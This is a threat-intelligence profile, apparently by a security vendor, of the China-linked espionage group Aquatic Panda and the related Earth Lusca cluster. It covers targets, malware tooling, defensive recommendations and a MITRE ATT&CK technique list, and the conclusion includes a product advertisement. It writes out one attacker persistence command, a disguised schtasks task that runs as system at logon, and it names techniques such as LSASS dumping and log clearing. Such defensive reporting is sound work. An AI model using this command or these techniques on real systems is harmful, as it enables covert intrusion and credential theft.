Threat Actor Profile: Aquatic Panda

Overview 

Aquatic Panda, a China-linked advanced persistent threat (APT) group, has been actively conducting cyber espionage and intelligence-gathering operations since at least May 2020. The group primarily targets telecommunications providers, technology firms, and government entities, aligning its operations with strategic intelligence objectives.

A closely related activity has also been observed under the cluster known as Earth Lusca, another Chinese cyber espionage group active since April 2019. While Earth Lusca has leveraged malware families historically associated with groups such as APT41, analysts assess that its infrastructure and operational patterns remain distinct. Together, these overlapping clusters demonstrate a broad, coordinated approach to global intelligence collection.

Aquatic Panda operators rely heavily on a mix of commodity and custom tooling, including frameworks like Cobalt Strike and Brute Ratel. A notable component of their toolkit is a downloader referred to as FishMaster, which is frequently used to stage secondary payloads such as njRAT. This layered approach allows the group to maintain flexibility while scaling operations across multiple targets and regions.

Attribution and Operational Origin

Aquatic Panda is assessed to originate from China, with activity primarily concentrated across the Asia-Pacific region but extending globally. Its targeting behavior, infrastructure reuse, and tooling overlap strongly suggest alignment with broader state-sponsored intelligence collection objectives.

In addition to cybersecurity industry reporting, Aquatic Panda has also been formally referenced by U.S. law enforcement authorities. The Federal Bureau of Investigation (FBI) has publicly identified Aquatic Panda cyber threat actors in connection with cyber-enabled criminal activity, including conspiracy to commit computer fraud and wire fraud, highlighting the group’s relevance to ongoing law enforcement investigations and its operational significance within the global threat landscape.

Separate reporting has also highlighted the broader ecosystem supporting such activity. Between approximately 2016 and 2023, the Chinese technology company Anxun Information Technology Co., Ltd. (“i-Soon”) was allegedly involved in coordinated intrusion activity under direction from Chinese state security services, including the Ministry of State Security (MSS) and Ministry of Public Security (MPS). 

i-Soon reportedly operated multiple intrusion teams targeting global victims, including government agencies, dissident groups, media organizations, and private-sector entities. This broader ecosystem provides important context for understanding how groups like Aquatic Panda may operate within a larger contractor- and state-aligned cyber infrastructure.

Targeting Profile 

Aquatic Panda demonstrates a wide targeting scope, focusing on industries that provide strategic, economic, or political intelligence value. Key sectors include: 

• Aerospace and Defense  

• Banking, Financial Services, and Insurance (BFSI)  

• Education  

• Government and Law Enforcement Agencies  

• Healthcare  

• Media and Entertainment  

• Professional Services  

• Technology  

• Telecommunications  

The breadth of these targets indicates a dual emphasis on both national security intelligence and economic espionage. 

Tooling and Malware Ecosystem 

Aquatic Panda employs a diverse malware ecosystem, combining legitimate administrative tools, open-source frameworks, and custom-developed implants. At least 14 malware families and utilities have been associated with the group. 

Prominent tools include: 

• Cobalt Strike (post-exploitation framework)  

• Brute Ratel (backdoor framework)  

• BIOPASS RAT (custom backdoor)  

• FishMaster (downloader)  

• FunnySwitch (loader)  

• njRAT (commodity remote access trojan)  

• ShadowPad (modular backdoor platform)  

• Winnti (variants for both Windows and Linux environments)  

Additional utilities such as certutil, nbtscan, and wevtutil are used for system interaction, reconnaissance, and data manipulation. Tunneling tools like EarthWorm and FRP enable covert communication channels, helping attackers bypass network defenses. 

This blend of tools reflects a pragmatic strategy: leveraging proven, widely available frameworks while supplementing them with custom components to evade detection and maintain persistence. 

Initial Access and Execution Techniques 

Aquatic Panda and associated Earth Lusca operations rely on multiple initial access vectors. These include: 

• Drive-by compromise (T1189): Watering hole attacks targeting frequently visited websites.  

• Exploitation of public-facing applications (T1190): Direct attacks against vulnerable servers, including Microsoft Exchange and Oracle GlassFish.  

• Spearphishing links (T1566.002): Emails containing malicious URLs designed to lure victims into executing payloads.  

Execution techniques vary depending on the environment. In Windows systems, the group has used Windows Management Instrumentation (WMI) for lateral movement and PowerShell to execute Base64-encoded commands and retrieve additional payloads. There have also been attempts to execute Bash commands through the Windows command shell (cmd /C), indicating occasional cross-platform experimentation. 

In Linux environments, attackers deploy malicious shell scripts following SSH access, often to install Linux variants of Winnti malware. Social engineering remains central to execution, with users frequently required to click on malicious links or open weaponized files to trigger loaders. 

Persistence and Credential Access 

To maintain long-term access, Aquatic Panda employs several persistence mechanisms. Earth Lusca activity has demonstrated the use of scheduled tasks, specifically leveraging commands such as: 

schtasks /Create /SC ONLOGON /TN WindowsUpdateCheck /TR “file path” /ru system 

This technique ensures payload execution upon user login, helping attackers survive system reboots. 

Credential access is another critical component of operations. Aquatic Panda captures valid domain accounts through multiple methods, enabling lateral movement and access to additional systems. The use of legitimate credentials reduces the likelihood of detection and facilitates deeper network penetration. 

Lateral Movement and Post-Exploitation Behavior 

Once inside a network, Aquatic Panda expands its foothold using a combination of credential reuse and system-level tools. WMI is frequently used for remote execution, while tunneling tools provide secure pathways for command-and-control communication. 

The group’s reliance on frameworks like Cobalt Strike allows operators to dynamically deploy modules for reconnaissance, privilege escalation, and data exfiltration. Meanwhile, tools such as nbtscan assist in identifying network shares and mapping internal infrastructure. 

Conclusion 

Aquatic Panda continues to operate as a persistent and adaptive cyber espionage actor since its emergence in 2020. Its ability to combine widely available tools with custom-developed malware enables scalable, resilient operations across multiple sectors. The overlap with clusters such as Earth Lusca further underscores the complexity of attribution within China’s broader cyber ecosystem. 

The group’s use of diverse initial access techniques, cross-platform tooling, and credential-driven lateral movement reflects a mature operational model focused on stealth, persistence, and long-term intelligence collection. 

Cyble assesses that such campaigns highlight the need for continuous, intelligence-led defense strategies powered by real-time visibility and proactive threat hunting. Strengthen your defenses with Cyble’s AI-powered threat intelligence. Leverage Cyble Blaze AI to predict, detect, and neutralize advanced threats before they impact your organization. 

Schedule a personalized demo to see how Cyble enables faster, smarter security operations at scale. 

Recommendations and Mitigation Strategies

• Strengthen email security controls by deploying advanced phishing detection, URL rewriting, and attachment sandboxing to reduce the risk of spearphishing-driven initial access (T1566.002).  

• Patch and harden internet-facing applications such as Microsoft Exchange, Oracle GlassFish, and other public-facing services to mitigate exploitation attempts (T1190).  

• Implement strict PowerShell and scripting restrictions, including logging, Constrained Language Mode, and script block monitoring to detect malicious encoded command execution.  

• Restrict and monitor the use of administrative utilities such as WMI, certutil, and wevtutil, as these are frequently abused for execution and reconnaissance in Aquatic Panda operations.  

• Deploy endpoint detection and response (EDR) solutions capable of identifying credential dumping tools such as Mimikatz, LSASS access attempts, and abnormal authentication patterns.  

• Enforce multi-factor authentication (MFA) across all privileged accounts and remote access systems to reduce the impact of stolen credentials and domain account abuse (T1078.002).  

• Segment internal networks and limit lateral movement pathways, especially restricting SMB traffic and unnecessary administrative shares to contain post-compromise spread.  

• Monitor for suspicious scheduled task creation and persistence mechanisms, including unusual use of schtasks commands and registry-based autoruns.  

• Detect and block known adversary tooling and frameworks, including Cobalt Strike, Brute Ratel, ShadowPad, and njRAT through signature-based and behavioral detection methods.  

• Enhance threat hunting and network visibility, focusing on anomalous tunneling activity (e.g., EarthWorm, FRP), unusual outbound connections, and encrypted C2 traffic over standard web protocols. 

MITRE ATT&CK Techniques Associated with Aquatic Panda

• Drive-by Compromise (T1189): Earth Lusca conducts watering hole attacks to deliver malicious payloads via compromised or lured websites. 

• Exploit Public-Facing Application (T1190): Earth Lusca exploits vulnerabilities in internet-facing systems such as Microsoft Exchange and Oracle GlassFish to gain initial access. 

• Spearphishing Link (T1566.002): Earth Lusca uses phishing emails containing malicious URLs to trick users into triggering infection chains. 

• Malicious Link (T1204.001): Users are directed to click on malicious links that load decoy documents and execute malware loaders. 

• Malicious File (T1204.002): Victims are required to open weaponized files that activate embedded payloads and loaders. 

• Windows Management Instrumentation (T1047): Aquatic Panda uses WMI for remote execution and lateral movement within compromised environments. 

• PowerShell (T1059.001): Execution of Base64-encoded commands and script-based payload retrieval through PowerShell. 

• Windows Command Shell (T1059.003): Attempts to execute cross-platform commands via cmd /C on Windows systems. 

• Unix Shell (T1059.004): Use of malicious shell scripts in Linux environments following SSH access to deploy Winnti variants. 

• Scheduled Task/Job (T1053): Earth Lusca establishes persistence using scheduled tasks that trigger malware execution at logon. 

• Domain Accounts (T1078.002): Aquatic Panda uses stolen domain credentials to maintain access and enable lateral movement. 

• SSH Authorized Keys (T1098.004): Earth Lusca implants SSH keys in /root/.ssh for persistent remote access. 

• Windows Service (T1543.003): Aquatic Panda creates disguised services to maintain persistence under legitimate-looking names. 

• Print Processors (T1547.012): Earth Lusca abuses Windows Print Processor registry keys to load malicious DLLs at system startup. 

• DLL Search Order Hijacking (T1574.001): Aquatic Panda abuses trusted Windows binaries to load malicious DLL, EXE, and DAT payloads. 

• Dynamic Linker Hijacking (T1574.006): Modification of Linux ld.so.preload to persist Winnti malware on Unix systems. 

• Bypass User Account Control (T1548.002): Earth Lusca uses Fodhelper-based UAC bypass techniques to gain elevated privileges. 

• Command Obfuscation (T1027.010): Aquatic Panda encodes PowerShell commands in Base64 to evade detection. 

• Masquerade Task or Service (T1036.004): Creation of fake services such as “Windows User Service” to blend with legitimate processes. 

• Match Legitimate Resource Name or Location (T1036.005): Renaming or relocating malicious binaries into trusted system paths. 

• Clear Windows Event Logs (T1070.001): Deletion of Windows logs to remove forensic traces of activity. 

• Clear Command History (T1070.003): Removal of Linux shell history to conceal executed commands. 

• File Deletion (T1070.004): Deletion of malware binaries after execution or staging. 

• Modify Registry (T1112): Registry changes enabling RestrictedAdmin mode for pass-the-hash RDP authentication. 

• Deobfuscate/Decode Files or Information (T1140): Use of certutil to decode and reconstruct malicious payloads. 

• Rundll32 (T1218.011): Execution of malicious DLLs via rundll32, including keylogging components. 

• Disable or Modify Tools (T1562.001): Attempts to disable endpoint detection and response (EDR) solutions. 

• LSASS Memory (T1003.001): Credential harvesting through LSASS memory dumping. 

• System Service Discovery (T1007): Identification of installed security and EDR services. 

• System Network Configuration Discovery (T1016): Use of ipconfig to gather network configuration details. 

• Remote System Discovery (T1018): PowerShell-based log analysis and scanning to identify active systems and connections. 

• System Owner/User Discovery (T1033): Enumeration of recently logged-in users on compromised systems. 

• System Network Connections Discovery (T1049): Use of netstat and event log parsing to identify active connections. 

• Process Discovery (T1057): Use of tasklist to enumerate running processes. 

• System Information Discovery (T1082): Execution of native OS commands to identify system and privilege details. 

• Account Discovery (T1087): Use of Linux last command to identify recent user logins. 

• Domain Trust Discovery (T1482): Use of nltest to enumerate domain controller relationships. 

• Security Software Discovery (T1518.001): Attempts to identify installed endpoint protection tools. 

• Log Enumeration (T1654): Analysis of authentication logs prior to selective deletion. 

• Remote Services (T1021): Use of scheduled tasks and remote execution for lateral movement. 

• Remote Desktop Protocol (T1021.001): Use of stolen credentials for RDP-based lateral movement. 

• SMB/Windows Admin Shares (T1021.002): Movement through administrative shares across internal networks. 

• SSH (T1021.004): Use of compromised SSH credentials for Linux-based lateral movement. 

• Exploitation of Remote Services (T1210): Use of ZeroLogon and related exploits against domain controllers. 

• Pass the Hash (T1550.002): Use of RestrictedAdmin mode to authenticate via hash-based RDP sessions. 

• Data from Local System (T1005): Extraction of local event logs using wevtutil for intelligence collection. 

• Archive via Utility (T1560.001): Use of WinRAR and 7-Zip to compress data before exfiltration. 

• Exfiltration to Cloud Storage (T1567.002): Use of MEGAcmd to upload stolen data to MEGA cloud storage. 

• Proxy (T1090): Use of Cloudflare infrastructure to mask command-and-control traffic. 

• Ingress Tool Transfer (T1105): Download and deployment of additional malware onto compromised systems. 

• Domains (T1583.001): Registration of spoofed domains for watering hole and phishing operations. 

• Server (T1583.004): Acquisition of dedicated servers for segmented operational roles. 

• Web Services (T1583.006): Use of GitHub accounts to host and distribute malicious tooling. 

• Compromised Infrastructure (T1584.004): Use of hijacked web servers for staging malware. 

• Compromised Web Services (T1584.006): Abuse of Google Drive repositories for hosting payloads. 

• Malware (T1588.001): Use of njRAT in operational deployments. 

• Tool (T1588.002): Use of Cobalt Strike for post-exploitation activity. 

• Upload Malware (T1608.001): Staging malicious files across GitHub, Google Drive, and compromised servers.